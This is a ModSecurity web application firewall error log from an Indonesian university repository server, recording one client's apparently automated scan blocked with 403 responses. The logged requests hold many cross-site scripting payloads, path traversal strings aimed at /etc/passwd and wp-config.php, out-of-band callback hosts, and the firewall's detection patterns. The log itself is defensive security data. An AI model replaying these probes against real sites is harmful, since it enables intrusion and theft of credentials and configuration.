[Tue Aug 29 11:51:24.901097 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAnIlggAAAAV"]
[Tue Aug 29 11:51:24.916702 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAlUligAAAA0"]
[Tue Aug 29 11:51:26.760709 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAlUlisAAAA0"]
[Tue Aug 29 11:51:26.796335 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAkr0GAAAAAC"]
[Tue Aug 29 11:51:27.032148 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAfWOFAAAAAL"]
[Tue Aug 29 11:51:27.033035 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/log"] [unique_id "ZO15T8Co-f0AAAlIBiUAAAAn"]
[Tue Aug 29 11:51:27.600838 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAkr0GQAAAAC"]
[Tue Aug 29 11:51:28.613483 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAlIBikAAAAn"]
[Tue Aug 29 11:51:28.915691 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkyyF0AAAAW"]
[Tue Aug 29 11:51:28.920532 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmNp5QAAAAQ"]
[Tue Aug 29 11:51:29.634787 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAmLPToAAAAN"]
[Tue Aug 29 11:51:30.625317 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAjdQVYAAAAZ"]
[Tue Aug 29 11:51:30.703080 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAfWOFkAAAAL"]
[Tue Aug 29 11:51:30.703394 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmQ-yUAAAAb"]
[Tue Aug 29 11:51:31.571093 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAmNp50AAAAQ"]
[Tue Aug 29 11:51:32.707657 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnVEdcAAAAB"]
[Tue Aug 29 11:51:33.760663 2023] [:error] [pid 2520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnYkjMAAAAD"]
[Tue Aug 29 11:51:33.769076 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15VcCo-f0AAAnZfDUAAAAG"]
[Tue Aug 29 11:51:35.062642 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@MAAAAI"]
[Tue Aug 29 11:51:35.100573 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnd2@UAAAAI"]
[Tue Aug 29 11:51:35.633521 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnf3lQAAAAM"]
[Tue Aug 29 11:51:35.675275 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAm7nAUAAAAE"]
[Tue Aug 29 11:51:39.607163 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAngCUkAAAAP"]
[Tue Aug 29 11:51:40.883573 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnd2-oAAAAI"]
[Tue Aug 29 11:51:42.611031 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAfWOHUAAAAL"]
[Tue Aug 29 11:51:44.563161 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnh6NMAAAAS"]
[Tue Aug 29 11:51:45.569671 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAm7nC0AAAAE"]
[Tue Aug 29 11:51:47.593619 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAfWOIgAAAAL"]
[Tue Aug 29 11:51:48.619505 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAm7nDgAAAAE"]
[Tue Aug 29 11:51:48.620294 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAhoHRQAAAAl"]
